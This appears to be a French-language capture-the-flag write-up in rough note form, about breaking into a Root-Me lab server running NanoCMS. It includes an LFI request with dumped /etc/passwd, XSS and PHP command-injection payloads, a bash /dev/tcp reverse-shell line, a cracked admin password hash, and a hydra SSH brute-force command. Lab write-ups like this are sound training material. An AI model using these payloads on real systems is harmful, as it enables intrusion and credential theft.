# Enumération ### Web ``` Site web Blog , utilisation de NanoCMS ``` locale file inclusion ``` http://ctf04.root-me.org/index.php?page=../../../../etc/passwd%00 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin polkituser:x:87:87:PolicyKit:/:/sbin/nologin avahi:x:499:499:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin torrent:x:497:496:BitTorrent Seed/Tracker:/var/spool/bittorrent:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash jennifer:x:501:501:Jennifer Sea:/home/jennifer:/bin/bash andy:x:502:502:Andrew Carp:/home/andy:/bin/bash loren:x:503:503:Loren Felt:/home/loren:/bin/bash amy:x:504:504:Amy Pendelton:/home/amy:/bin/bash mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin gobuster dir -u http://ctf04.root-me.org -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://ctf04.root-me.org [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/11/20 10:02:31 Starting gobuster =============================================================== /.hta (Status: 403) /.htaccess (Status: 403) /.htpasswd (Status: 403) /~operator (Status: 403) /~root (Status: 403) /cgi-bin/ (Status: 403) /events (Status: 301) /inc (Status: 301) /index.php (Status: 200) /info.php (Status: 200) /list (Status: 301) /mail (Status: 301) /phpmyadmin (Status: 301) /squirrelmail (Status: 301) /stats (Status: 301) /usage (Status: 403) =============================================================== 2020/11/20 10:02:44 Finished =============================================================== ``` ``` Injection de code lors de la creation/modification d'une page du blog dans le titre ou dans le corps (XSS) ``` <script>alert('injection réussi !');</script> ``` Injection PHP dans le corps de la page Infri créée pour explorer l'arborescence du site pour trouver une connexion mysql... Resultat : avec le code suivant on trouve le fichier settings.php ``` <?php $command=shell_exec('cat /var/www/html/events/sites/default/settings.php'); echo $command; ?> ``` dans ce fichier on trouve la connexion à la base MySQL : ``` $db_url = 'mysql://username:password@localhost/databasename'; * $db_url = 'mysqli://username:password@localhost/databasename'; * $db_url = 'pgsql://username:password@localhost/databasename'; */ $db_url = 'mysql://root:mysqlpassword@localhost/drupal'; connexion possible a la base si on arrive avoir le mdp d'un user car admin/shannon ne fonctionne pas ### Serveurs **LE BRUTEFORCE FAIT TOMBER LA VM ROOT-ME** root@kali:/home/kali# nmap -p1-65000 -sV ctf04.root-me.org Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-20 10:08 CET Nmap scan report for ctf04.root-me.org (212.129.29.186) Host is up (0.023s latency). Not shown: 64989 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7 (protocol 2.0) 25/tcp filtered smtp 80/tcp open http Apache httpd 2.2.6 ((Fedora)) 110/tcp open pop3 ipop3d 2006k.101 111/tcp open rpcbind 2-4 (RPC #100000) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP) 143/tcp open imap University of Washington IMAP imapd 2006k.396 (time zone: -0500) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP) 901/tcp open http Samba SWAT administration server 3306/tcp open mysql MySQL 5.0.45 51823/tcp open status 1 (RPC #100024) Service Info: Host: 10.66.4.100 Mysql : https://www.cvedetails.com/vulnerability-list/vendor_id-185/product_id-316/version_id-55503/Mysql-Mysql-5.0.45.html ``` Reverse shell ``` <?php $cmd=shell_exec("nc -l -vv 1000"); ou bash -i >& /dev/tcp/<IP>/<PORT> >&1 echo $cmd; ?> ### Users ``` Web : Andy / Operator ``` ``` http://ctf07.root-me.org/~andy/data/pagesdata.txt s:8:"username";s:5:"admin"; s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd"; password en MD5 -> après decryptage : shannon ``` connexion a la page http://ctf07.root-me.org/~andy/data/nanoadmin.php avec username = admin et password = shannon ``` Serveur : patrick, jennifer, andy, loren et amy. ``` hydra -L user.txt -P gistfile1.txt -e nsr ssh://212.83.175.152:22/ # Exploitation Web , nano CMS exploit password discolusre Web, LFI show passwd file # Priv Esc # Password / hashes